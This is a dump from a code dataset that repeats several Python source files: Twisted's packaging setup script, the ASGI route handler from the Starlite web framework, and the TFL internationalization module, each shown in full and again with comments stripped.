_EXTRA_OPTIONS['soap'] +
_EXTRA_OPTIONS['serial'] +
_EXTRA_OPTIONS['http2']
)
_EXTRAS_REQUIRE = {
'dev': _EXTRA_OPTIONS['dev'],
'tls': _EXTRA_OPTIONS['tls'],
'conch': _EXTRA_OPTIONS['conch'],
'soap': _EXTRA_OPTIONS['soap'],
'serial': _EXTRA_OPTIONS['serial'],
'http2': _EXTRA_OPTIONS['http2'],
'all_non_platform': _PLATFORM_INDEPENDENT,
'macos_platform': (
_EXTRA_OPTIONS['macos'] + _PLATFORM_INDEPENDENT
),
'windows_platform': (
_EXTRA_OPTIONS['windows'] + _PLATFORM_INDEPENDENT
),
}
_EXTRAS_REQUIRE['osx_platform'] = _EXTRAS_REQUIRE['macos_platform']
# Scripts provided by Twisted on Python 2 and 3.
_CONSOLE_SCRIPTS = [
"ckeygen = twisted.conch.scripts.ckeygen:run",
"cftp = twisted.conch.scripts.cftp:run",
"conch = twisted.conch.scripts.conch:run",
"mailmail = twisted.mail.scripts.mailmail:run",
"pyhtmlizer = twisted.scripts.htmlizer:run",
"tkconch = twisted.conch.scripts.tkconch:run",
"trial = twisted.scripts.trial:run",
"twist = twisted.application.twist._twist:Twist.main",
"twistd = twisted.scripts.twistd:run",
]
class ConditionalExtension(Extension, object):
"""
An extension module that will only be compiled if certain conditions are
met.
@param condition: A callable of one argument which returns True or False to
indicate whether the extension should be built. The argument is an
instance of L{build_ext_twisted}, which has useful methods for checking
things about the platform.
"""
def __init__(self, *args, **kwargs):
self.condition = kwargs.pop("condition", lambda builder: True)
Extension.__init__(self, *args, **kwargs)
# The C extensions used for Twisted.
_EXTENSIONS = [
ConditionalExtension(
"twisted.test.raiser",
sources=["src/twisted/test/raiser.c"],
condition=lambda _: _isCPython),
ConditionalExtension(
"twisted.internet.iocpreactor.iocpsupport",
sources=[
"src/twisted/internet/iocpreactor/iocpsupport/iocpsupport.c",
"src/twisted/internet/iocpreactor/iocpsupport/winsock_pointers.c",
],
libraries=["ws2_32"],
condition=lambda _: _isCPython and sys.platform == "win32"),
ConditionalExtension(
"twisted.python._sendmsg",
sources=["src/twisted/python/_sendmsg.c"],
condition=lambda _: not _PY3 and sys.platform != "win32"),
]
def _longDescriptionArgsFromReadme(readme):
"""
Generate a PyPI long description from the readme.
@param readme: Path to the readme reStructuredText file.
@type readme: C{str}
@return: Keyword arguments to be passed to C{setuptools.setup()}.
@rtype: C{str}
"""
with io.open(readme, encoding='utf-8') as f:
readmeRst = f.read()
# Munge links of the form `NEWS <NEWS.rst>`_ to point at the appropriate
# location on GitHub so that they function when the long description is
# displayed on PyPI.
longDesc = re.sub(
r'`([^`]+)\s+<(?!https?://)([^>]+)>`_',
r'`\1 <https://github.com/twisted/twisted/blob/trunk/\2>`_',
readmeRst,
flags=re.I,
)
return {
'long_description': longDesc,
'long_description_content_type': 'text/x-rst',
}
def getSetupArgs(extensions=_EXTENSIONS, readme='README.rst'):
"""
Generate arguments for C{setuptools.setup()}
@param extensions: C extension modules to maybe build. This argument is to
be used for testing.
@type extensions: C{list} of C{ConditionalExtension}
@param readme: Path to the readme reStructuredText file. This argument is
to be used for testing.
@type readme: C{str}
@return: The keyword arguments to be used by the setup method.
@rtype: L{dict}
"""
arguments = STATIC_PACKAGE_METADATA.copy()
if readme:
arguments.update(_longDescriptionArgsFromReadme(readme))
# This is a workaround for distutils behavior; ext_modules isn't
# actually used by our custom builder. distutils deep-down checks
# to see if there are any ext_modules defined before invoking
# the build_ext command. We need to trigger build_ext regardless
# because it is the thing that does the conditional checks to see
# if it should build any extensions. The reason we have to delay
# the conditional checks until then is that the compiler objects
# are not yet set up when this code is executed.
arguments["ext_modules"] = extensions
# Use custome class to build the extensions.
class my_build_ext(build_ext_twisted):
conditionalExtensions = extensions
command_classes = {
'build_ext': my_build_ext,
}
if sys.version_info[0] >= 3:
command_classes['build_py'] = BuildPy3
requirements = [
"zope.interface >= 4.4.2",
"constantly >= 15.1",
"incremental >= 16.10.1",
"Automat >= 0.3.0",
"hyperlink >= 17.1.1",
# PyHamcrest 1.10.0 is Python 3 only, but lacks package metadata that
# says so. This condition can be dropped when Twisted drops support for
# Python 2.7.
"PyHamcrest >= 1.9.0, != 1.10.0",
"attrs >= 19.2.0",
]
arguments.update(dict(
packages=find_packages("src"),
use_incremental=True,
setup_requires=["incremental >= 16.10.1"],
install_requires=requirements,
entry_points={
'console_scripts': _CONSOLE_SCRIPTS
},
cmdclass=command_classes,
include_package_data=True,
exclude_package_data={
"": ["*.c", "*.h", "*.pxi", "*.pyx", "build.bat"],
},
zip_safe=False,
extras_require=_EXTRAS_REQUIRE,
package_dir={"": "src"},
))
return arguments
class BuildPy3(build_py, object):
"""
A version of build_py that doesn't install the modules that aren't yet
ported to Python 3.
"""
def find_package_modules(self, package, package_dir):
modules = [
module for module
in build_py.find_package_modules(self, package, package_dir)
if ".".join([module[0], module[1]]) not in notPortedModules]
return modules
## Helpers and distutil tweaks
class build_ext_twisted(build_ext.build_ext, object):
"""
Allow subclasses to easily detect and customize Extensions to
build at install-time.
"""
def prepare_extensions(self):
"""
Prepare the C{self.extensions} attribute (used by
L{build_ext.build_ext}) by checking which extensions in
I{conditionalExtensions} should be built. In addition, if we are
building on NT, define the WIN32 macro to 1.
"""
# always define WIN32 under Windows
if os.name == 'nt':
self.define_macros = [("WIN32", 1)]
else:
self.define_macros = []
# On Solaris 10, we need to define the _XOPEN_SOURCE and
# _XOPEN_SOURCE_EXTENDED macros to build in order to gain access to
# the msg_control, msg_controllen, and msg_flags members in
# sendmsg.c. (according to
# https://stackoverflow.com/questions/1034587). See the documentation
# of X/Open CAE in the standards(5) man page of Solaris.
if sys.platform.startswith('sunos'):
self.define_macros.append(('_XOPEN_SOURCE', 1))
self.define_macros.append(('_XOPEN_SOURCE_EXTENDED', 1))
self.extensions = [
x for x in self.conditionalExtensions if x.condition(self)
]
for ext in self.extensions:
ext.define_macros.extend(self.define_macros)
def build_extensions(self):
"""
Check to see which extension modules to build and then build them.
"""
self.prepare_extensions()
build_ext.build_ext.build_extensions(self)
def _remove_conftest(self):
for filename in ("conftest.c", "conftest.o", "conftest.obj"):
try:
os.unlink(filename)
except EnvironmentError:
pass
def _compile_helper(self, content):
conftest = open("conftest.c", "w")
try:
with conftest:
conftest.write(content)
try:
self.compiler.compile(["conftest.c"], output_dir='')
except CompileError:
return False
return True
finally:
self._remove_conftest()
def _check_header(self, header_name):
"""
Check if the given header can be included by trying to compile a file
that contains only an #include line.
"""
self.compiler.announce("checking for {} ...".format(header_name), 0)
return self._compile_helper("#include <{}>\n".format(header_name))
def _checkCPython(sys=sys, platform=platform):
"""
Checks if this implementation is CPython.
This uses C{platform.python_implementation}.
This takes C{sys} and C{platform} kwargs that by default use the real
modules. You shouldn't care about these -- they are for testing purposes
only.
@return: C{False} if the implementation is definitely not CPython, C{True}
otherwise.
"""
return platform.python_implementation() == "CPython"
_isCPython = _checkCPython()
notPortedModules = [
"twisted.mail.alias",
"twisted.mail.bounce",
"twisted.mail.mail",
"twisted.mail.maildir",
"twisted.mail.pb",
"twisted.mail.relaymanager",
"twisted.mail.scripts.__init__",
"twisted.mail.tap",
"twisted.mail.test.test_bounce",
"twisted.mail.test.test_mail",
"twisted.mail.test.test_options",
"twisted.mail.test.test_scripts",
"twisted.news.__init__",
"twisted.news.database",
"twisted.news.news",
"twisted.news.nntp",
"twisted.news.tap",
"twisted.news.test.__init__",
"twisted.news.test.test_database",
"twisted.news.test.test_news",
"twisted.news.test.test_nntp",
"twisted.plugins.twisted_mail",
"twisted.plugins.twisted_news",
"twisted.protocols.shoutcast",
"twisted.python.finalize",
"twisted.python.hook",
"twisted.python.test.cmodulepullpipe",
"twisted.python.test.test_pydoctor",
"twisted.python.test.test_win32",
"twisted.test.test_hook",
"twisted.web.soap",
"twisted.web.test.test_soap",
]
| 31.524336
| 79
| 0.644186
|
import io
import os
import platform
import re
import sys
from distutils.command import build_ext
from distutils.errors import CompileError
from setuptools import Extension, find_packages
from setuptools.command.build_py import build_py
if sys.version_info < (3, 0):
_PY3 = False
else:
_PY3 = True
STATIC_PACKAGE_METADATA = dict(
name="Twisted",
description="An asynchronous networking framework written in Python",
author="Twisted Matrix Laboratories",
author_email="twisted-python@twistedmatrix.com",
maintainer="Glyph Lefkowitz",
maintainer_email="glyph@twistedmatrix.com",
url="https://twistedmatrix.com/",
project_urls={
'Documentation': 'https://twistedmatrix.com/documents/current/',
'Source': 'https://github.com/twisted/twisted',
'Issues': 'https://twistedmatrix.com/trac/report',
},
license="MIT",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
)
_dev = [
'pyflakes >= 1.0.0',
'twisted-dev-tools >= 0.0.2',
'python-subunit',
'sphinx >= 1.3.1',
'towncrier >= 17.4.0'
]
if not _PY3:
_dev += [
'twistedchecker >= 0.4.0',
'pydoctor >= 16.2.0',
]
_EXTRA_OPTIONS = dict(
dev=_dev,
tls=[
'pyopenssl >= 16.0.0',
'service_identity >= 18.1.0',
'idna >= 0.6, != 2.3',
],
conch=[
'pyasn1',
'cryptography >= 2.6',
'appdirs >= 1.4.0',
'bcrypt >= 3.0.0',
],
soap=['soappy'],
serial=['pyserial >= 3.0',
'pywin32 != 226; platform_system == "Windows"'],
macos=['pyobjc-core',
'pyobjc-framework-CFNetwork',
'pyobjc-framework-Cocoa'],
windows=['pywin32 != 226'],
http2=['h2 >= 3.0, < 4.0',
'priority >= 1.1.0, < 2.0'],
)
_PLATFORM_INDEPENDENT = (
_EXTRA_OPTIONS['tls'] +
_EXTRA_OPTIONS['conch'] +
_EXTRA_OPTIONS['soap'] +
_EXTRA_OPTIONS['serial'] +
_EXTRA_OPTIONS['http2']
)
_EXTRAS_REQUIRE = {
'dev': _EXTRA_OPTIONS['dev'],
'tls': _EXTRA_OPTIONS['tls'],
'conch': _EXTRA_OPTIONS['conch'],
'soap': _EXTRA_OPTIONS['soap'],
'serial': _EXTRA_OPTIONS['serial'],
'http2': _EXTRA_OPTIONS['http2'],
'all_non_platform': _PLATFORM_INDEPENDENT,
'macos_platform': (
_EXTRA_OPTIONS['macos'] + _PLATFORM_INDEPENDENT
),
'windows_platform': (
_EXTRA_OPTIONS['windows'] + _PLATFORM_INDEPENDENT
),
}
_EXTRAS_REQUIRE['osx_platform'] = _EXTRAS_REQUIRE['macos_platform']
_CONSOLE_SCRIPTS = [
"ckeygen = twisted.conch.scripts.ckeygen:run",
"cftp = twisted.conch.scripts.cftp:run",
"conch = twisted.conch.scripts.conch:run",
"mailmail = twisted.mail.scripts.mailmail:run",
"pyhtmlizer = twisted.scripts.htmlizer:run",
"tkconch = twisted.conch.scripts.tkconch:run",
"trial = twisted.scripts.trial:run",
"twist = twisted.application.twist._twist:Twist.main",
"twistd = twisted.scripts.twistd:run",
]
class ConditionalExtension(Extension, object):
def __init__(self, *args, **kwargs):
self.condition = kwargs.pop("condition", lambda builder: True)
Extension.__init__(self, *args, **kwargs)
_EXTENSIONS = [
ConditionalExtension(
"twisted.test.raiser",
sources=["src/twisted/test/raiser.c"],
condition=lambda _: _isCPython),
ConditionalExtension(
"twisted.internet.iocpreactor.iocpsupport",
sources=[
"src/twisted/internet/iocpreactor/iocpsupport/iocpsupport.c",
"src/twisted/internet/iocpreactor/iocpsupport/winsock_pointers.c",
],
libraries=["ws2_32"],
condition=lambda _: _isCPython and sys.platform == "win32"),
ConditionalExtension(
"twisted.python._sendmsg",
sources=["src/twisted/python/_sendmsg.c"],
condition=lambda _: not _PY3 and sys.platform != "win32"),
]
def _longDescriptionArgsFromReadme(readme):
with io.open(readme, encoding='utf-8') as f:
readmeRst = f.read()
longDesc = re.sub(
r'`([^`]+)\s+<(?!https?://)([^>]+)>`_',
r'`\1 <https://github.com/twisted/twisted/blob/trunk/\2>`_',
readmeRst,
flags=re.I,
)
return {
'long_description': longDesc,
'long_description_content_type': 'text/x-rst',
}
def getSetupArgs(extensions=_EXTENSIONS, readme='README.rst'):
arguments = STATIC_PACKAGE_METADATA.copy()
if readme:
arguments.update(_longDescriptionArgsFromReadme(readme))
# actually used by our custom builder. distutils deep-down checks
# to see if there are any ext_modules defined before invoking
# the build_ext command. We need to trigger build_ext regardless
# because it is the thing that does the conditional checks to see
# if it should build any extensions. The reason we have to delay
# the conditional checks until then is that the compiler objects
# are not yet set up when this code is executed.
arguments["ext_modules"] = extensions
# Use custome class to build the extensions.
class my_build_ext(build_ext_twisted):
conditionalExtensions = extensions
command_classes = {
'build_ext': my_build_ext,
}
if sys.version_info[0] >= 3:
command_classes['build_py'] = BuildPy3
requirements = [
"zope.interface >= 4.4.2",
"constantly >= 15.1",
"incremental >= 16.10.1",
"Automat >= 0.3.0",
"hyperlink >= 17.1.1",
# PyHamcrest 1.10.0 is Python 3 only, but lacks package metadata that
# says so. This condition can be dropped when Twisted drops support for
# Python 2.7.
"PyHamcrest >= 1.9.0, != 1.10.0",
"attrs >= 19.2.0",
]
arguments.update(dict(
packages=find_packages("src"),
use_incremental=True,
setup_requires=["incremental >= 16.10.1"],
install_requires=requirements,
entry_points={
'console_scripts': _CONSOLE_SCRIPTS
},
cmdclass=command_classes,
include_package_data=True,
exclude_package_data={
"": ["*.c", "*.h", "*.pxi", "*.pyx", "build.bat"],
},
zip_safe=False,
extras_require=_EXTRAS_REQUIRE,
package_dir={"": "src"},
))
return arguments
class BuildPy3(build_py, object):
def find_package_modules(self, package, package_dir):
modules = [
module for module
in build_py.find_package_modules(self, package, package_dir)
if ".".join([module[0], module[1]]) not in notPortedModules]
return modules
## Helpers and distutil tweaks
class build_ext_twisted(build_ext.build_ext, object):
def prepare_extensions(self):
# always define WIN32 under Windows
if os.name == 'nt':
self.define_macros = [("WIN32", 1)]
else:
self.define_macros = []
# On Solaris 10, we need to define the _XOPEN_SOURCE and
# _XOPEN_SOURCE_EXTENDED macros to build in order to gain access to
# the msg_control, msg_controllen, and msg_flags members in
# sendmsg.c. (according to
# https://stackoverflow.com/questions/1034587). See the documentation
# of X/Open CAE in the standards(5) man page of Solaris.
if sys.platform.startswith('sunos'):
self.define_macros.append(('_XOPEN_SOURCE', 1))
self.define_macros.append(('_XOPEN_SOURCE_EXTENDED', 1))
self.extensions = [
x for x in self.conditionalExtensions if x.condition(self)
]
for ext in self.extensions:
ext.define_macros.extend(self.define_macros)
def build_extensions(self):
self.prepare_extensions()
build_ext.build_ext.build_extensions(self)
def _remove_conftest(self):
for filename in ("conftest.c", "conftest.o", "conftest.obj"):
try:
os.unlink(filename)
except EnvironmentError:
pass
def _compile_helper(self, content):
conftest = open("conftest.c", "w")
try:
with conftest:
conftest.write(content)
try:
self.compiler.compile(["conftest.c"], output_dir='')
except CompileError:
return False
return True
finally:
self._remove_conftest()
def _check_header(self, header_name):
self.compiler.announce("checking for {} ...".format(header_name), 0)
return self._compile_helper("#include <{}>\n".format(header_name))
def _checkCPython(sys=sys, platform=platform):
return platform.python_implementation() == "CPython"
_isCPython = _checkCPython()
notPortedModules = [
"twisted.mail.alias",
"twisted.mail.bounce",
"twisted.mail.mail",
"twisted.mail.maildir",
"twisted.mail.pb",
"twisted.mail.relaymanager",
"twisted.mail.scripts.__init__",
"twisted.mail.tap",
"twisted.mail.test.test_bounce",
"twisted.mail.test.test_mail",
"twisted.mail.test.test_options",
"twisted.mail.test.test_scripts",
"twisted.news.__init__",
"twisted.news.database",
"twisted.news.news",
"twisted.news.nntp",
"twisted.news.tap",
"twisted.news.test.__init__",
"twisted.news.test.test_database",
"twisted.news.test.test_news",
"twisted.news.test.test_nntp",
"twisted.plugins.twisted_mail",
"twisted.plugins.twisted_news",
"twisted.protocols.shoutcast",
"twisted.python.finalize",
"twisted.python.hook",
"twisted.python.test.cmodulepullpipe",
"twisted.python.test.test_pydoctor",
"twisted.python.test.test_win32",
"twisted.test.test_hook",
"twisted.web.soap",
"twisted.web.test.test_soap",
]
| true
| true
|
1c421be8bea10155ae25c22a24e0e3f840106c07
| 1,844
|
py
|
Python
|
starlite/handlers/asgi.py
|
to-ph/starlite
|
8169749468c1fb76c408c9939669e89e18ca6f02
|
[
"MIT"
] | 334
|
2022-01-07T12:14:54.000Z
|
2022-03-30T23:28:03.000Z
|
starlite/handlers/asgi.py
|
to-ph/starlite
|
8169749468c1fb76c408c9939669e89e18ca6f02
|
[
"MIT"
] | 70
|
2022-01-06T18:41:33.000Z
|
2022-03-23T20:21:33.000Z
|
starlite/handlers/asgi.py
|
to-ph/starlite
|
8169749468c1fb76c408c9939669e89e18ca6f02
|
[
"MIT"
] | 24
|
2022-01-06T22:02:01.000Z
|
2022-03-20T01:43:39.000Z
|
from inspect import Signature, iscoroutinefunction
from typing import Any, Dict, List, Optional, Union, cast
from pydantic import validate_arguments
from pydantic.typing import AnyCallable
from starlite.exceptions import ImproperlyConfiguredException
from starlite.handlers.base import BaseRouteHandler
from starlite.types import Guard
class ASGIRouteHandler(BaseRouteHandler):
@validate_arguments(config={"arbitrary_types_allowed": True})
def __init__(
self,
path: Union[Optional[str], Optional[List[str]]] = None,
guards: Optional[List[Guard]] = None,
opt: Optional[Dict[str, Any]] = None,
):
super().__init__(path=path, guards=guards, opt=opt)
def __call__(self, fn: AnyCallable) -> "ASGIRouteHandler":
"""
Replaces a function with itself
"""
self.fn = fn
self.validate_handler_function()
return self
def validate_handler_function(self) -> None:
"""
Validates the route handler function once it's set by inspecting its return annotations
"""
super().validate_handler_function()
signature = Signature.from_callable(cast(AnyCallable, self.fn))
if signature.return_annotation is not None:
raise ImproperlyConfiguredException("ASGI handler functions should return 'None'")
if any(key not in signature.parameters for key in ["scope", "send", "receive"]):
raise ImproperlyConfiguredException(
"ASGI handler functions should define 'scope', 'send' and 'receive' arguments"
)
if not iscoroutinefunction(self.fn) and not iscoroutinefunction(self.fn.__call__): # type: ignore[operator]
raise ImproperlyConfiguredException("Functions decorated with 'asgi' must be async functions")
asgi = ASGIRouteHandler
| 38.416667
| 116
| 0.693059
|
from inspect import Signature, iscoroutinefunction
from typing import Any, Dict, List, Optional, Union, cast
from pydantic import validate_arguments
from pydantic.typing import AnyCallable
from starlite.exceptions import ImproperlyConfiguredException
from starlite.handlers.base import BaseRouteHandler
from starlite.types import Guard
class ASGIRouteHandler(BaseRouteHandler):
@validate_arguments(config={"arbitrary_types_allowed": True})
def __init__(
self,
path: Union[Optional[str], Optional[List[str]]] = None,
guards: Optional[List[Guard]] = None,
opt: Optional[Dict[str, Any]] = None,
):
super().__init__(path=path, guards=guards, opt=opt)
def __call__(self, fn: AnyCallable) -> "ASGIRouteHandler":
self.fn = fn
self.validate_handler_function()
return self
def validate_handler_function(self) -> None:
super().validate_handler_function()
signature = Signature.from_callable(cast(AnyCallable, self.fn))
if signature.return_annotation is not None:
raise ImproperlyConfiguredException("ASGI handler functions should return 'None'")
if any(key not in signature.parameters for key in ["scope", "send", "receive"]):
raise ImproperlyConfiguredException(
"ASGI handler functions should define 'scope', 'send' and 'receive' arguments"
)
if not iscoroutinefunction(self.fn) and not iscoroutinefunction(self.fn.__call__):
raise ImproperlyConfiguredException("Functions decorated with 'asgi' must be async functions")
asgi = ASGIRouteHandler
| true
| true
|
1c421c084e646eb6b6d1dc10ae2a6dceda689c38
| 9,411
|
py
|
Python
|
venv/Lib/site-packages/_TFL/I18N.py
|
nasir733/airbnb-clone
|
9ac746b6f3f3c8fc45f97773266e6f5f182d14b9
|
[
"MIT"
] | 6
|
2016-12-10T17:51:10.000Z
|
2021-10-11T07:51:48.000Z
|
venv/Lib/site-packages/_TFL/I18N.py
|
nasir733/airbnb-clone
|
9ac746b6f3f3c8fc45f97773266e6f5f182d14b9
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/_TFL/I18N.py
|
nasir733/airbnb-clone
|
9ac746b6f3f3c8fc45f97773266e6f5f182d14b9
|
[
"MIT"
] | 3
|
2020-03-29T07:37:03.000Z
|
2021-01-21T16:08:40.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2019 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.I18N
#
# Purpose
# Support for internationalization (I18N)
#
# Revision Dates
# 28-Oct-2009 (CT) Creation
# 19-Jan-2010 (CT) `_Tn` changed to make `plural` and `n` optional
# 21-Jan-2010 (MG) Real translation added
# 21-Jan-2010 (CT) Module-level aliases added, `I18N.ungettext` corrected
# 21-Jan-2010 (CT) `load_languages` and `use_language` added
# 21-Jan-2010 (MG) Reworked
# 21-Jan-2010 (MG) `save_eval` added
# 25-Jan-2010 (MG) Support list of languages in `use` and `context`
# 31-Jan-2010 (CT) `import babel.support` moved inside functions
# 18-Feb-2010 (CT) `Name` added
# 22-Feb-2010 (CT) `choose` factored, `Config.choice` added
# 15-Apr-2010 (MG) `Translations` added and used
# 16-Jun-2010 (CT) `encoding` added
# 16-Jun-2010 (CT) `encoding` changed to Record with fields `file_system`,
# `input`, and `output`
# 16-Jun-2010 (CT) s/print/pyk.fprint/
# 17-Jun-2010 (CT) `encode_f` and `encode_o` added
# 18-Jun-2010 (CT) `Translations` factored to `TFL.Babel`
# 18-Jun-2010 (CT) `decode` added
# 4-Aug-2010 (MG) `load`: `log_level` added
# 30-Nov-2010 (CT) s/save_eval/safe_eval/ and removed `strip`-call from it
# 23-Mar-2011 (CT) `_T` defined (instead of aliased) to guard against
# empty argument
# 20-Jul-2011 (CT) `_Config_._properties` added
# 20-Jul-2011 (CT) Use encoding information from `TFL.user_config`
# 4-Dec-2013 (CT) Change `safe_eval` to not add coding cookie;
# `eval` fails for `unicode` value containing coding cookie
# 9-Dec-2013 (CT) Fix 3-compatibility
# 26-Mar-2014 (CT) Change `ungettext` to use `ugettext` for `n == 1`
# 31-Mar-2014 (CT) Add guard for `AttributeError` to `ugettext`, `ungettext`
# (3-compatibility for `gettext.NullTranslations`)
# 31-Mar-2014 (CT) Use `print` in doctest of `context` (3-compatibility)
# 8-Oct-2015 (CT) Change `__getattr__` to *not* handle `__XXX__`
# 11-Feb-2016 (CT) Add `test_language`
# 9-Dec-2019 (CT) Change `decode` to use `pyk.decoded`, not home-grown code
# * Python 3 compatibility
# ««revision-date»»···
#--
from _TFL import TFL
from _TFL.pyk import pyk
from _TFL.Record import Record
from _TFL.predicate import first, split_hst
import _TFL.Decorator
import _TFL.User_Config
import gettext
import locale
import sys
class _Config_ (Record) :
_properties = ("choice", )
@property
def choice (self) :
"""Language choice."""
return TFL.user_config.language
# end def choice
@choice.setter
def choice (self, value) :
TFL.user_config.language = value
# end def choice
# end class _Config_
Config = _Config_ \
( Languages = {"" : gettext.NullTranslations ()}
, locale_dir = "locale"
, domains = ("messages", )
)
Config.current = Config.Null = Config.Languages [""]
class _Name_ (TFL.Meta.Object) :
"""Translator for names"""
def __getattr__ (self, name) :
if name.startswith ("__") and name.endswith ("__") :
### Placate inspect.unwrap of Python 3.5,
### which accesses `__wrapped__` and eventually throws `ValueError`
return getattr (self.__super, name)
return _T (name)
# end def __getattr__
def __getitem__ (self, key) :
return _T (key)
# end def __getitem__
# end class _Name_
def add (self, * languages, ** kw) :
locale_dir = kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
_load_languages (locale_dir, languages, domains)
if use_lang :
use (use_lang)
# end def add
def choose (* lang) :
def _gen (lang) :
for l in lang :
yield l, l
for l in lang :
if l :
a, _, b = split_hst (l, "_")
yield a, b or a
yield "", ""
return first (l for l in _gen (lang) if l [0] in Config.Languages)
# end def choose
@TFL.Contextmanager
def context (* lang) :
"""Temporarily change the translation language
### Let's fake some Translations
>>> from _TFL._Babel.Translations import Translations
>>> Config.Languages ["l1"] = l1 = Translations ()
>>> Config.Languages ["l2"] = l2 = Translations ()
>>> l1._catalog = dict (text1 = u"L1: Text 1", text2 = u"L1: Text 2")
>>> l2._catalog = dict (text1 = u"L2: Text 1", text2 = u"L2: Text 2")
>>> print (_T ("text1"))
text1
>>> with context ("l1") :
... print (_T ("text1"))
... print (_T ("text2"))
L1: Text 1
L1: Text 2
>>> with context ("l2") :
... print (_T ("text1"))
... print (_T ("text2"))
L2: Text 1
L2: Text 2
"""
old = Config.current, Config.choice
try :
use (* lang)
yield
finally :
Config.current, Config.choice = old
# end def context
def decode (s) :
"""Decode `s` using `TFL.user_config.input_encoding`."""
s = pyk.decoded (s, TFL.user_config.input_encoding)
return s
# end def decode
def encode_f (s, errors = "replace") :
"""Encodes `s` using `TFL.user_config.file_system_encoding`."""
return s.encode (TFL.user_config.file_system_encoding, errors)
# end def encode_f
def encode_o (s, errors = "replace") :
"""Encodes `s` using `TFL.user_config.output_encoding`."""
return s.encode (TFL.user_config.output_encoding, errors)
# end def encode_o
def load (* languages, ** kw) :
locale_dir = kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
log_level = kw.pop ("log_level", 5)
Config.domains = domains
Config.locale_dir = locale_dir
_load_languages (locale_dir, languages, domains, log_level)
if use_lang:
use (use_lang)
# end def load
def _load_languages (locale_dir, languages, domains, log_level) :
from _TFL._Babel.Translations import Translations
if not isinstance (domains, (list, tuple)) :
domains = (domains, )
first_dom = domains [0]
domains = domains [1:]
for lang in languages :
Config.Languages [lang] = lang_trans = Translations.load \
(locale_dir, lang, first_dom)
if not isinstance (lang_trans, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, first_dom)
)
for d in domains :
new_domain = Translations.load (locale_dir, lang, d)
if not isinstance (new_domain, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, d)
)
lang_trans.merge (new_domain)
# end def _load_languages
def mark (text):
"""Mark `text` for translation."""
return str (text)
# end def mark
def safe_eval (value, encoding = None) :
if encoding and not isinstance (value, str) :
try :
value = value.decode (encoding)
except Exception as exc :
print (repr (value), encoding)
raise
try :
result = TFL.r_eval (value)
except SyntaxError :
print (value)
raise
return result
# end def safe_eval
@TFL.Contextmanager
def test_language (lang) :
"""Load and use language `lang` from `locale` in library directory."""
from _TFL.sos import path
ld = path.join \
(path.abspath (path.dirname (path.dirname (__file__))), "locale")
load (lang, locale_dir = ld)
with context (lang) :
yield
# end def test_language
def ugettext (text, trans = None) :
"""Return the localized translation of `text` (as unicode)."""
try :
translator = (trans or Config.current).ugettext
except AttributeError :
return text
else :
return translator (text)
# end def ugettext
def ungettext (singular, plural = None, n = 99, trans = None) :
"""Return the localized translation of `singular/plural` for the plural form
appropriate for `n` (as unicode).
"""
if n == 1 :
return ugettext (singular, trans)
else :
if plural is None :
plural = singular + "s"
try :
translator = (trans or Config.current).ungettext
except AttributeError :
return plural
else :
return translator (singular, plural, n)
# end def ungettext
def use (* lang) :
Config.choice = (l, v) = choose (* lang)
Config.current = Config.Languages [l]
# end def use
_ = mark
def _T (s) :
if s :
return ugettext (s)
return s
# end def _T
_Tn = ungettext
Name = _Name_ ()
if __name__ != "__main__" :
TFL._Export_Module ()
### __END__ TFL.I18N
| 32.340206
| 80
| 0.592817
|
from _TFL import TFL
from _TFL.pyk import pyk
from _TFL.Record import Record
from _TFL.predicate import first, split_hst
import _TFL.Decorator
import _TFL.User_Config
import gettext
import locale
import sys
class _Config_ (Record) :
_properties = ("choice", )
@property
def choice (self) :
return TFL.user_config.language
@choice.setter
def choice (self, value) :
TFL.user_config.language = value
Config = _Config_ \
( Languages = {"" : gettext.NullTranslations ()}
, locale_dir = "locale"
, domains = ("messages", )
)
Config.current = Config.Null = Config.Languages [""]
class _Name_ (TFL.Meta.Object) :
def __getattr__ (self, name) :
if name.startswith ("__") and name.endswith ("__") :
= kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
_load_languages (locale_dir, languages, domains)
if use_lang :
use (use_lang)
def choose (* lang) :
def _gen (lang) :
for l in lang :
yield l, l
for l in lang :
if l :
a, _, b = split_hst (l, "_")
yield a, b or a
yield "", ""
return first (l for l in _gen (lang) if l [0] in Config.Languages)
@TFL.Contextmanager
def context (* lang) :
old = Config.current, Config.choice
try :
use (* lang)
yield
finally :
Config.current, Config.choice = old
def decode (s) :
s = pyk.decoded (s, TFL.user_config.input_encoding)
return s
def encode_f (s, errors = "replace") :
return s.encode (TFL.user_config.file_system_encoding, errors)
def encode_o (s, errors = "replace") :
return s.encode (TFL.user_config.output_encoding, errors)
def load (* languages, ** kw) :
locale_dir = kw.pop ("locale_dir", Config.locale_dir)
domains = kw.pop ("domains", Config.domains)
use_lang = kw.pop ("use", "")
log_level = kw.pop ("log_level", 5)
Config.domains = domains
Config.locale_dir = locale_dir
_load_languages (locale_dir, languages, domains, log_level)
if use_lang:
use (use_lang)
def _load_languages (locale_dir, languages, domains, log_level) :
from _TFL._Babel.Translations import Translations
if not isinstance (domains, (list, tuple)) :
domains = (domains, )
first_dom = domains [0]
domains = domains [1:]
for lang in languages :
Config.Languages [lang] = lang_trans = Translations.load \
(locale_dir, lang, first_dom)
if not isinstance (lang_trans, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, first_dom)
)
for d in domains :
new_domain = Translations.load (locale_dir, lang, d)
if not isinstance (new_domain, Translations) and log_level >= 5 :
print \
( "*** Warning, language %s for domain %s not found!"
% (lang, d)
)
lang_trans.merge (new_domain)
